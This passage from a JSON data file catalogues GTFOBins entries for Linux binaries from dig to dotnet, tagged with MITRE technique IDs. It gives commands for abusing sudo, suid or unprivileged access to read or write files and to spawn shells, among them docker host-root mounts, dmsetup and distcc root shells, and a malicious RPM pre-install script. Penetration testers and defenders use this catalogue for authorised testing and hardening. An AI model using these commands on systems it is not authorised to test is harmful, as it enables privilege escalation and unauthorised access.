installation","aliases":[]},{"id":"gtfo:dig:file-read:0:suid","toolId":"gtfo:dig","toolName":"dig","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"dig -f /path/to/input-file","description":"Each input line is treated as a lookup query for the `dig` command and the output is corrupted with the result or errors of the operation.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/dig/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:dig:file-read:0:unprivileged","toolId":"gtfo:dig","toolName":"dig","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"dig -f /path/to/input-file","description":"Each input line is treated as a lookup query for the `dig` command and the output is corrupted with the result or errors of the operation.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/dig/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:distcc:shell:0:sudo","toolId":"gtfo:distcc","toolName":"distcc","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"distcc /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/distcc/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:distcc:shell:0:suid","toolId":"gtfo:distcc","toolName":"distcc","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"distcc /bin/sh -p","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/distcc/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:distcc:shell:0:unprivileged","toolId":"gtfo:distcc","toolName":"distcc","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"distcc /bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/distcc/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:dmesg:file-read:0:sudo","toolId":"gtfo:dmesg","toolName":"dmesg","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"dmesg -rF /path/to/input-file","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/dmesg/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:dmesg:file-read:0:suid","toolId":"gtfo:dmesg","toolName":"dmesg","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"dmesg -rF /path/to/input-file","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/dmesg/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:dmesg:file-read:0:unprivileged","toolId":"gtfo:dmesg","toolName":"dmesg","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"dmesg -rF /path/to/input-file","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/dmesg/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:dmesg:inherit:0:sudo","toolId":"gtfo:dmesg","toolName":"dmesg","name":"inherit ← less","source":"GTFOBins","platform":["Linux"],"capability":["Execution","File Read","File Write","Privilege Escalation"],"nativeCategory":["inherit","from:less"],"command":"dmesg -H","mitre":["T1059","T1005","T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/dmesg/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:dmesg:inherit:0:suid","toolId":"gtfo:dmesg","toolName":"dmesg","name":"inherit ← less","source":"GTFOBins","platform":["Linux"],"capability":["Execution","File Read","File Write","Privilege Escalation"],"nativeCategory":["inherit","from:less"],"command":"dmesg -H","mitre":["T1059","T1005","T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/dmesg/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:dmesg:inherit:0:unprivileged","toolId":"gtfo:dmesg","toolName":"dmesg","name":"inherit ← less","source":"GTFOBins","platform":["Linux"],"capability":["Execution","File Read","File Write"],"nativeCategory":["inherit","from:less"],"command":"dmesg -H","mitre":["T1059","T1005","T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/dmesg/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:dmidecode:file-write:0:unprivileged","toolId":"gtfo:dmidecode","toolName":"dmidecode","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"dmidecode --no-sysfs -d x.dmi --dump-bin /path/to/output-file","description":"It can be used to write files using a specially crafted SMBIOS file that can be read as a memory device by dmidecode.\nGenerate the file with [dmiwrite](https://github.com/adamreiser/dmiwrite) and upload it to the target.\n\n- `--dump-bin`, will cause dmidecode to write the payload to the destination specified, prepended with 32 null bytes.\n\n- `--no-sysfs`, if the target system is using an older version of dmidecode, you may need to omit the option.\n\n```\nmake dmiwrite\necho DATA >/path/to/temp-file\n./dmiwrite /path/to/temp-file x.dmi\n```","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/dmidecode/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:dmsetup:shell:0:sudo","toolId":"gtfo:dmsetup","toolName":"dmsetup","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"dmsetup create base <<EOF\n0 3534848 linear /dev/loop0 94208\nEOF\ndmsetup ls --exec '/bin/sh -s'","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/dmsetup/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:dmsetup:shell:0:suid","toolId":"gtfo:dmsetup","toolName":"dmsetup","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"dmsetup create base <<EOF\n0 3534848 linear /dev/loop0 94208\nEOF\ndmsetup ls --exec '/bin/sh -p -s'","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/dmsetup/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:dmsetup:shell:0:unprivileged","toolId":"gtfo:dmsetup","toolName":"dmsetup","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"dmsetup create base <<EOF\n0 3534848 linear /dev/loop0 94208\nEOF\ndmsetup ls --exec '/bin/sh -s'","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/dmsetup/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:dnf:command:0:sudo","toolId":"gtfo:dnf","toolName":"dnf","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["command"],"command":"dnf install -y x-1.0-1.noarch.rpm --disablerepo=*","description":"Generate the RPM package with [fpm](https://github.com/jordansissel/fpm) and upload it to the target.\n\n```\necho /path/to/command >x.sh\nfpm -n x -s dir -t rpm -a all --before-install x.sh .\n```\n\nThe `--disablerepo=*` option is used for targets without Internet connectivity, can be omitted otherwise.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/dnf/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:dnsmasq:command:0:sudo","toolId":"gtfo:dnsmasq","toolName":"dnsmasq","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["command"],"command":"dnsmasq --conf-script='/path/to/command 1>&2'","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/dnsmasq/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:dnsmasq:command:0:suid","toolId":"gtfo:dnsmasq","toolName":"dnsmasq","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["command"],"command":"dnsmasq --conf-script='/path/to/command 1>&2'","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/dnsmasq/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:dnsmasq:command:0:unprivileged","toolId":"gtfo:dnsmasq","toolName":"dnsmasq","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["command"],"command":"dnsmasq --conf-script='/path/to/command 1>&2'","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/dnsmasq/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:doas:shell:0:sudo","toolId":"gtfo:doas","toolName":"doas","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"doas -u root /bin/sh","description":"The user must be allowed to use `doas`.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/doas/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:doas:shell:0:unprivileged","toolId":"gtfo:doas","toolName":"doas","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"doas -u root /bin/sh","description":"The user must be allowed to use `doas`.","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/doas/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:docker:file-read:0:sudo","toolId":"gtfo:docker","toolName":"docker","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"docker cp /path/to/input-file $CONTAINER_ID:input-file\ndocker cp $CONTAINER_ID:input-file /path/to/temp-file\ncat /path/to/temp-file","description":"Read a file by copying it to a temporary container (`$CONTAINER_ID`) and back to a new location on the host.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/docker/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Containers"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:docker:file-read:0:suid","toolId":"gtfo:docker","toolName":"docker","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"docker cp /path/to/input-file $CONTAINER_ID:input-file\ndocker cp $CONTAINER_ID:input-file /path/to/temp-file\ncat /path/to/temp-file","description":"Read a file by copying it to a temporary container (`$CONTAINER_ID`) and back to a new location on the host.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/docker/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Containers"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:docker:file-read:0:unprivileged","toolId":"gtfo:docker","toolName":"docker","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"docker cp /path/to/input-file $CONTAINER_ID:input-file\ndocker cp $CONTAINER_ID:input-file /path/to/temp-file\ncat /path/to/temp-file","description":"Read a file by copying it to a temporary container (`$CONTAINER_ID`) and back to a new location on the host.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/docker/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Containers"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:docker:file-write:0:sudo","toolId":"gtfo:docker","toolName":"docker","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"echo DATA >/path/to/temp-file\ndocker cp /path/to/temp-file $CONTAINER_ID:temp-file\ndocker cp $CONTAINER_ID /path/to/output-file","description":"Write a file by copying it to a temporary container (`$CONTAINER_ID`) and back to the target destination on the host.","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/docker/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Containers"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:docker:file-write:0:suid","toolId":"gtfo:docker","toolName":"docker","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"echo DATA >/path/to/temp-file\ndocker cp /path/to/temp-file $CONTAINER_ID:temp-file\ndocker cp $CONTAINER_ID /path/to/output-file","description":"Write a file by copying it to a temporary container (`$CONTAINER_ID`) and back to the target destination on the host.","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/docker/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Containers"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:docker:file-write:0:unprivileged","toolId":"gtfo:docker","toolName":"docker","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"echo DATA >/path/to/temp-file\ndocker cp /path/to/temp-file $CONTAINER_ID:temp-file\ndocker cp $CONTAINER_ID /path/to/output-file","description":"Write a file by copying it to a temporary container (`$CONTAINER_ID`) and back to the target destination on the host.","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/docker/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Containers"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:docker:shell:0:sudo","toolId":"gtfo:docker","toolName":"docker","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"docker run -v /:/mnt --rm -it alpine chroot /mnt /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/docker/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Containers"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:docker:shell:0:suid","toolId":"gtfo:docker","toolName":"docker","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"docker run -v /:/mnt --rm -it alpine chroot /mnt /bin/sh","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/docker/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Containers"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:docker:shell:0:unprivileged","toolId":"gtfo:docker","toolName":"docker","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"docker run -v /:/mnt --rm -it alpine chroot /mnt /bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/docker/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Containers"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:docker:shell:1:sudo","toolId":"gtfo:docker","toolName":"docker","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"docker run --rm -it --privileged -u root alpine\nmount /dev/sda1 /mnt/\nls -la /mnt/\nchroot /mnt /bin/bash","description":"This exploits the fact that is run with the `--privileged` option to directly mount a host's disk, e.g., `/dev/sda1`.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/docker/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Containers"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:docker:shell:1:suid","toolId":"gtfo:docker","toolName":"docker","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"docker run --rm -it --privileged -u root alpine\nmount /dev/sda1 /mnt/\nls -la /mnt/\nchroot /mnt /bin/bash","description":"This exploits the fact that is run with the `--privileged` option to directly mount a host's disk, e.g., `/dev/sda1`.","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/docker/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Containers"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:docker:shell:1:unprivileged","toolId":"gtfo:docker","toolName":"docker","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"docker run --rm -it --privileged -u root alpine\nmount /dev/sda1 /mnt/\nls -la /mnt/\nchroot /mnt /bin/bash","description":"This exploits the fact that is run with the `--privileged` option to directly mount a host's disk, e.g., `/dev/sda1`.","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/docker/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Containers"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:dos2unix:file-read:0:sudo","toolId":"gtfo:dos2unix","toolName":"dos2unix","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"dos2unix -f -O /path/to/input-file","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/dos2unix/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:dos2unix:file-read:0:suid","toolId":"gtfo:dos2unix","toolName":"dos2unix","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"dos2unix -f -O /path/to/input-file","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/dos2unix/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:dos2unix:file-read:0:unprivileged","toolId":"gtfo:dos2unix","toolName":"dos2unix","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"dos2unix -f -O /path/to/input-file","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/dos2unix/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:dos2unix:file-write:0:sudo","toolId":"gtfo:dos2unix","toolName":"dos2unix","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"dos2unix -f -n /path/to/input-file /path/to/output-file","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/dos2unix/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:dos2unix:file-write:0:suid","toolId":"gtfo:dos2unix","toolName":"dos2unix","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"dos2unix -f -n /path/to/input-file /path/to/output-file","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/dos2unix/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:dos2unix:file-write:0:unprivileged","toolId":"gtfo:dos2unix","toolName":"dos2unix","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"dos2unix -f -n /path/to/input-file /path/to/output-file","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/dos2unix/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:dosbox:file-read:0:sudo","toolId":"gtfo:dosbox","toolName":"dosbox","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"dosbox -c 'mount c /' -c 'type c:\\path\\to\\input'","description":"The file content will be displayed in the DOSBox graphical window.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/dosbox/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:dosbox:file-read:0:suid","toolId":"gtfo:dosbox","toolName":"dosbox","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"dosbox -c 'mount c /' -c 'type c:\\path\\to\\input'","description":"The file content will be displayed in the DOSBox graphical window.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/dosbox/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:dosbox:file-read:0:unprivileged","toolId":"gtfo:dosbox","toolName":"dosbox","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"dosbox -c 'mount c /' -c 'type c:\\path\\to\\input'","description":"The file content will be displayed in the DOSBox graphical window.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/dosbox/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:dosbox:file-read:1:sudo","toolId":"gtfo:dosbox","toolName":"dosbox","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"dosbox -c 'mount c /' -c 'copy c:\\path\\to\\input c:\\path\\to\\output' -c exit\ncat /path/to/OUTPUT","description":"The file is copied to a readable location.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/dosbox/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:dosbox:file-read:1:suid","toolId":"gtfo:dosbox","toolName":"dosbox","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"dosbox -c 'mount c /' -c 'copy c:\\path\\to\\input c:\\path\\to\\output' -c exit\ncat /path/to/OUTPUT","description":"The file is copied to a readable location.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/dosbox/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:dosbox:file-read:1:unprivileged","toolId":"gtfo:dosbox","toolName":"dosbox","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"dosbox -c 'mount c /' -c 'copy c:\\path\\to\\input c:\\path\\to\\output' -c exit\ncat /path/to/OUTPUT","description":"The file is copied to a readable location.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/dosbox/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:dosbox:file-write:0:sudo","toolId":"gtfo:dosbox","toolName":"dosbox","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"dosbox -c 'mount c /' -c \"echo DATA >c:\\path\\to\\output\" -c exit","description":"Note that `echo` terminates the string with a DOS-style line terminator (`\\r\\n`), if that's a problem and your scenario allows it, you can create the file outside `dosbox`, then use `copy` to do the actual write.","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/dosbox/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:dosbox:file-write:0:suid","toolId":"gtfo:dosbox","toolName":"dosbox","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"dosbox -c 'mount c /' -c \"echo DATA >c:\\path\\to\\output\" -c exit","description":"Note that `echo` terminates the string with a DOS-style line terminator (`\\r\\n`), if that's a problem and your scenario allows it, you can create the file outside `dosbox`, then use `copy` to do the actual write.","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/dosbox/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:dosbox:file-write:0:unprivileged","toolId":"gtfo:dosbox","toolName":"dosbox","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"dosbox -c 'mount c /' -c \"echo DATA >c:\\path\\to\\output\" -c exit","description":"Note that `echo` terminates the string with a DOS-style line terminator (`\\r\\n`), if that's a problem and your scenario allows it, you can create the file outside `dosbox`, then use `copy` to do the actual write.","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/dosbox/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:dotnet:file-read:0:sudo","toolId":"gtfo:dotnet","toolName":"dotnet","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"dotnet 